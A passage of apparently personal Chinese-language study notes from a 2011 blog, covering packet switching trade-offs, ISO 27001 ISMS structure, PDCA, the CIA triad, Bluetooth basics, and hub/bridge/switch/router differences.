4. 當網路有壅塞的狀況時, 可動態選擇其他路徑,以避開壅塞

[缺點]
1. 分割與重組封包需花費額外的時間
2. 每個封包需加上標頭, 會增加傳送的總資料量
3. 路由器依據標頭,選擇路徑亦需花費時間

1月 26, 2011

資訊安全管理系統(ISMS)

參考文件 (寫的很好一定要看)

BSI在1999年發行BS7799 Part-1 and Part-2

- BS7799 part1 → ISO 17799 → ISO 27002
資訊安全實施的參考文件(實施指南)

- BS7799 part2 → ISO 27001(ISMS)
提供資訊安全管理系統(ISMS) 建立實施與書面化具體要求,依據個別組織的需求
規定要實施之安全控制措施,如果要得到證書要遵循此要求。

**

Information Security Management Systems (ISO 27001)

資訊安全管理系統 (ISMS)的正式定義為:
整體管理系統的一部分,以營運風險導向為基礎,用以建立、實作、運作、監視、審查、維持及改進資訊安全。

ISO 27001 非常重視持續改進的精神,因此,要求針對每個發生的資安事件擬定矯正措施,而非危機處理完畢就落幕,以防止類似的資安事件再次發生。

資訊安全管理系統(ISMS)的整體架構規劃而言,是採用 規劃–執行–檢查–行動 (Plan–Do–Check–Act,簡稱 PDCA)的模式來設。
規劃(建立 ISMS)
建立資訊安全管理系統之政策、目標、標的、流程及相關程序,以管理風險及改進資訊安全,使結果與組織整體政策及組織目標一致。

執行(實施與操作ISMS)
資訊安全管理系統之政策、控制措施、流程與程序之實施與操作。

檢查(監控與審查ISMS)
依據資訊安全管理系統之政策、目標與實際經驗,以評鑑及測量(適當時)流程績效,並將結果回報給管理階層加以審查

行動(維持與改進ISMS)
依據內部稽核、管理階層審查結果或其他資訊,採取矯正與預防措施,以達成持續改進資訊安全管理系統之目的。
ISO 27001 針對 11 個控制面相制訂了 39 個控制目標(133 個控制措施),由於這些控制面相具體呈現資訊安全管理系統(ISMS)的預防與查核重點,ISO 27001 雖然詳列了133 個控制措施以供參考,不過都還祇是原則式的敘述,為了進一步協助實際運作,另外有一個與ISO 27001相搭配的標準 ISO 27002(原為 ISO 17799) 資訊安全管理作業要點

ISO 27001 對資訊安全管理系統(ISMS)的實作規劃,是以資產(Asset)為出發點,透過適當的風險評鑑(Risk Assessment)和風險處理(Risk Treatment)使剩餘風險(Residual Risk)皆在可接受的範圍內,藉以達到效益和成本的最佳平衡,並完成資訊安全的三個最主要目標:

機密性(Confidentiality)、完整性(Integrity)、可用性(Availability)
C - 資料的機密性要求(Confidentiality) :
確保只有被授權的用戶,才可依權限存取資料。保護資訊不被非法存取或揭露

I - 資料的完整性要求(Integrity) :
確保資料是完整的,沒有被竊取或不當修改。

A - 資料的可取用性(Availability) :
確保被授權的用戶,當有需要存取資料時,得以順利獲得。
以下列出這 ISO 27001 (ISMS) 的 11 個管理要項:

1. 安全政策
提供資安願景、方向來指導資安流程。

2. 安全組織
內部組織:內部專責的組織負責資安作業
外部團體:資安委外給資訊安全管理者

3. 資產管理
進行資產的盤點、分類,鑑別出企業內所涵蓋的資產有那些,如此才知企業所要保護的資
產範圍。

4. 人員安全
降低粗心、人為錯誤,或者濫用資訊設備所帶來的風險。
人員的聘顧、解聘應該有的作業程序,例如該移除離職員工的 IS 存取權。

5. 實體與環境安全
避免未授權的存取、破壞實體設備,設備的安全保護。

6. 通訊與作業管理
維持通訊的可用性、確保資訊在網路上的保全、第三方服務交付管理、系統規劃與驗收。

7. 存取控制
使用者存取管理、網路存取控制、資料存取控制、偵測不正常授權行為

8. 系統獲取、開發及維護
確保所有的 IT 專案是在安全考量下進行、確保運作中的系統有內建安全機制。

9. 資訊安全事故管理
通報資訊事件與弱點、災害回復

10. 持續管理
持續管理的資訊安全層面

11. 遵循
安全政策與標準的遵循性以及技術遵循性

藍芽技術 (Bluetooth)

藍牙技術 (Bluetooth)

*速率達 1 Mbps
*短距離 (10 公尺內) 無線傳輸
*使用 2.4 GHz 公用頻帶
*跳頻式展頻傳輸技術(FHSS) - 每秒 1600 次
*藍牙網路 (Piconet) 總共可以有 8 個藍牙裝置

1月 25, 2011

hub bridge switch router

hub: Layer 1 實體層設備,就是 repeater 只能用來重新發出收到的訊息。

bridge: Layer 2 設備,可以用來橋接不同網段。
可以隔開 collision domain,但是不能隔開 broadcast domain。
僅在不同網路之間有數據傳輸的時候才將數據轉發到其他網路。
具有 MAC 位址的 learning 功能,建立 bridge table 記 port<->MAC
若不知道目的port 的話,直接用 flooding 的方式。

switch: Layer 2 設備
就是 N個 port 的 bridge。具有更快的封包處理速度。
每個 port 都有自己的獨立頻寬,不屬於自己的封包不會丟到我家的 port。
仍屬同一個 broadcast domain

router: Layer 3 設備,位於網路層。具備路由機制與計算路由的能力。
可以切割 collision domain 與 broadcast domain

Ethernet Spec

各類乙太規格: 10Mb, 100Mb, 1Gb



原始 doc 在此